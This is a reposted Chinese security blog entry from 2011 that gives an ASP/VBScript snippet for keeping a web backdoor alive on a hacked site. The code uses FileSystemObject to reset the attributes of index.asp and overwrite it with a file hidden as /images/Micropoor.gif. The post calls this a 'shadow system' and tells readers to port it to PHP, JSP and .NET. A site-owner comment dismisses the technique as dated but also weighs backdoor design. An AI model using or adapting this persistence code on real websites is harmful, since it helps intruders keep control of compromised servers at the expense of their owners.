Php安全新闻早8点(2011-11-15 星期二)

admin 2021年4月3日19:35:58评论26 views字数 726阅读2分25秒阅读模式

    转载自:http://hi.baidu.com/micropoor

//2011-11-15 星期二
// 管理员的思维:
查找asp,php,jsp,.net脚本文件关键词
//我们的思维:
Set fso = CreateObject("Scripting.FileSystemObject")    
sFile = Server.Mappath("/index.asp")   
Set objFile = fso.GetFile(sFile)    
if  objFile.attributes 32 then:objFile.attributes = 32:end if   
fso.CopyFile Server.Mappath("/images/Micropoor.gif"),Server.Mappath("/index.asp")
%>
 
//一箭双雕:
那么我们可不可以把它作为index.php的还原精灵呢?它不仅仅是后门,更是我们的影子系统。
 
//课后题:
聪明的你,一定会把它演变成PHP,JSP,.NET等

    结论:站在“敌人”的角度考虑,往往你就是赢家。

站长评论:

这种没用的,早已经将 FSO 组件作为关键词了。

而且手法也相当古老了,只能蒙混小白。

并且很多机器 FSO 早卸载了,后门需要支持的东西越少越好。

还不如:

更爽一些。

文章来源于lcx.cc:Php安全新闻早8点(2011-11-15 星期二)

相关推荐: 【VB】SendKeys 语句详解

    SendKeys 语句 描述     将一个或多个按键消息发送到活动窗口,就如同用键盘进行输入一样。 语法     SendKeys string[, wait]     参数意义:     string部分必需的,字符串表达式,指定要发送的按键消息。…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:35:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Php安全新闻早8点(2011-11-15 星期二)https://cn-sec.com/archives/323795.html

发表评论

匿名网友 填写信息